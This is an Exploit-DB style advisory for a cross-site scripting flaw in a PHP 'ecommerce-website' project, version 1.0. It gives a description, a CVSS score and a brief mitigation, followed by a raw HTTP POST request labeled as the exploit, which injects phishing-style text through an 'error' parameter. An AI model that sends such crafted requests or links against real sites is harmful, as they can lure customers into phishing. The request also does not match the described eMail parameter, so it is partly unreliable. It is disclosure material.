Ecommerse v1.0 - Cross-Site Scripting (XSS)

vendor:

ecommerce-website

by:

nu11secur1ty

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: ecommerce-website

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE:

CPE: a:winston-dsouza:ecommerce-website

Metasploit:

Other Scripts:

Platforms Tested:

2022

Ecommerse v1.0 – Cross-Site Scripting (XSS)

The value of the eMail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick the users of this system, very easy to visit a very dangerous link from anywhere, and then the game will over for these customers. Also, the attacker can create a network from botnet computers by using this vulnerability.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.

Source

Exploit-DB raw data:

## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS) 
## Author: nu11secur1ty
## Date: 11.23.2022
## Vendor: https://github.com/winston-dsouza
## Software: https://github.com/winston-dsouza/ecommerce-website
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website

## Description:
The value of the eMail request parameter is copied into the value of
an HTML tag attribute which is encapsulated in double quotation marks.
The attacker can trick the users of this system, very easy to visit a
very dangerous link from anywhere, and then the game will over for
these customers.
Also, the attacker can create a network from botnet computers by using
this vulnerability.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Exploit:

```POST
POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/ecommerce/index.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)

## Proof and Exploit:
[href](https://streamable.com/3r4t36)

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>